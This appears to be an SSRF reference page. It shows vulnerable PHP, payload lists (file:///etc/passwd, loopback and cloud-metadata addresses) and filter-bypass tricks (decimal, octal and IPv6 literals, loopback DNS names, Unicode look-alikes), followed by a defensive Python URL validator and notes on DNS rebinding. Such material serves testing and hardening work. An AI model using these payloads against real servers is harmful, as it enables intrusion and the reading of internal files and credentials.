Server Side Request Forgery (SSRF)
A Server-Side Request Forgery (SSRF) attack involves an attacker abusing server functionality to access or modify resources. The attacker targets an application that imports data from URLs, or otherwise fetches and reads data from a user-supplied URL, so that the server makes the request on the attacker's behalf.
Example of vulnerable PHP code
<?php
// The URL comes straight from the request: scheme, host and port are all attacker-controlled.
file_get_contents($_GET['file']);
?>
Schemes (URL schemes a permissive fetch function will follow)
HTTP
http://localhost
FILE
file:///etc/passwd
gopher
gopher://127.0.0.1/
FTP
ftp://127.0.0.1:21
Payloads
localhost:
- localhost
- localhost:8080
127.0.0.1:
- 127.0.0.1
- 127.0.0.1:8080
Loopback:
- 127.0.0.1
- 127.0.0.2
- 127.0.0.3
IPv6:
- http://[::ffff:7f00:1]/
HTTPS:
- https://localhost
- https://127.0.0.1
- https://127.0.0.2
- https://[::ffff:7f00:1]/
Bypass payloads
Bypass using a decimal IP
http://2130706433/ = http://127.0.0.1
http://3232235521/ = http://192.168.0.1
http://2852039166/ = http://169.254.169.254
http://3232235777/ = http://192.168.1.1
How to create a decimal IP?
# bash: pack the four dotted-quad octets into a single 32-bit integer
ip_to_decimal() {
local a b c d
IFS=. read -r a b c d <<< "$1"
echo $((a * 256 ** 3 + b * 256 ** 2 + c * 256 + d))
}
ip_to_decimal 127.0.0.1   # prints 2130706433
Replace 127.0.0.1 with your payload IP address.
Bypass using rare address
http://0/
http://127.1
http://127.0.1
Bypass using octal IP
http://0o177.0.0.1/ = http://127.0.0.1
Bypass using IPv6/IPv4 Address Embedding
http://[0:0:0:0:0:ffff:127.0.0.1]
http://[::ffff:127.0.0.1]
Bypass using DNS
localtest.me
localh.st
You can register your own domain at duckdns and point it to 127.0.0.1.
Bypass using enclosed alphanumerics
http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ = example.com
① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿
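Every bypass above (decimal, octal, short-form and IPv4-mapped IPv6 literals, DNS names that resolve to loopback, enclosed alphanumerics) defeats a filter that compares the raw string against "127.0.0.1" or "localhost". The defensive counterpart is to canonicalise the host before deciding, reject schemes the application does not need (file:, gopher:, ftp: from the Schemes section), resolve names, and check every resulting address against the internal ranges. The block below is an added example written for this page, not code from the original page or from any project it references. It goes slightly beyond the listed payloads (hex literals such as 0x7f.0.0.1 and mixed forms are handled by the same routine). `FAKE_DNS`, `fake_resolver`, the function names and the stand-in address for example.com are all constructed for the example so it runs offline.

```python
import ipaddress
import unicodedata
from typing import List, Optional, Tuple
from urllib.parse import urlsplit

# Only the schemes the application genuinely needs; file:, gopher: and ftp: are refused.
ALLOWED_SCHEMES = {"http", "https"}

# Constructed stand-in for DNS so the example runs offline (hypothetical data).
# In production use socket.getaddrinfo() and check EVERY address it returns.
FAKE_DNS = {
    "localhost": ["127.0.0.1"],
    "localtest.me": ["127.0.0.1"],
    "example.com": ["93.184.216.34"],  # stand-in public address, not authoritative
}


def fake_resolver(name: str) -> List[str]:
    return FAKE_DNS.get(name, [])


def _part_to_int(part: str) -> int:
    """Parse one dotted component the way permissive inet_aton-style parsers do:
    0x.. hex, 0o.. or leading-zero octal, otherwise decimal."""
    p = part.lower()
    if p.startswith("0x"):
        return int(p[2:], 16)
    if p.startswith("0o"):
        return int(p[2:], 8)
    if len(p) > 1 and p.startswith("0"):
        return int(p, 8)
    return int(p, 10)


def canonical_ipv4(host: str) -> Optional[ipaddress.IPv4Address]:
    """Turn shorthand literals (2130706433, 127.1, 0177.0.0.1, 0x7f.1, 0) into a
    normal IPv4Address. Returns None if host is not a numeric IPv4 literal."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    try:
        nums = [_part_to_int(p) for p in parts]
    except ValueError:
        return None
    # All but the last component are single bytes; the last fills the remaining bytes.
    if any(not 0 <= n <= 255 for n in nums[:-1]):
        return None
    tail_bits = 8 * (5 - len(parts))
    if not 0 <= nums[-1] < (1 << tail_bits):
        return None
    value = 0
    for n in nums[:-1]:
        value = (value << 8) | n
    return ipaddress.IPv4Address((value << tail_bits) | nums[-1])


def canonical_host(raw_host: str) -> str:
    """Fold Unicode look-alikes such as enclosed alphanumerics (NFKC, as IDNA does),
    lower-case, drop a trailing dot and any surrounding IPv6 brackets."""
    host = unicodedata.normalize("NFKC", raw_host).lower().rstrip(".")
    if host.startswith("[") and host.endswith("]"):
        host = host[1:-1]
    return host


def resolve(host: str, resolver=fake_resolver) -> list:
    """Every address the host maps to: numeric literals are canonicalised locally,
    names go through the resolver. IPv4-mapped IPv6 (::ffff:a.b.c.d) is unwrapped."""
    v4 = canonical_ipv4(host)
    if v4 is not None:
        return [v4]
    try:
        v6 = ipaddress.IPv6Address(host)
    except ValueError:
        return [ipaddress.ip_address(a) for a in resolver(host)]
    return [v6.ipv4_mapped or v6]


def is_internal(ip) -> bool:
    """Loopback, RFC 1918, link-local (covers 169.254.169.254), multicast, reserved, 0.0.0.0."""
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def check_url(url: str, resolver=fake_resolver) -> Tuple[bool, str]:
    """(allowed, reason): allowed only if the scheme is permitted and every address
    the host maps to is public."""
    try:
        parts = urlsplit(url)
    except ValueError as exc:
        return False, f"unparseable URL: {exc}"
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme not allowed: {parts.scheme or '<none>'}"
    if not parts.hostname:
        return False, "no host"
    host = canonical_host(parts.hostname)
    addrs = resolve(host, resolver)
    if not addrs:
        return False, f"unresolvable host: {host}"
    for ip in addrs:
        if is_internal(ip):
            return False, f"{host} -> {ip} is not a public address"
    return True, f"{host} -> {', '.join(map(str, addrs))}"


if __name__ == "__main__":
    for u in ("http://2130706433/", "http://127.1", "http://0o177.0.0.1/", "http://0/",
              "http://[::ffff:7f00:1]/", "http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ/", "http://localtest.me/",
              "http://169.254.169.254/", "file:///etc/passwd", "http://example.com/"):
        print(f"{u:35} {check_url(u)}")
```

Two caveats for anyone adapting this. The fetch must connect to the address that was checked, not re-resolve the name, otherwise a DNS answer that changes between check and fetch (rebinding) makes the check worthless. And redirects must be re-checked with the same function, since a public host can 302 to an internal one.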
Useful tools
New CVEs
- CVE-2024-2961 can escalate SSRF to RCE in PHP 8.1 web applications.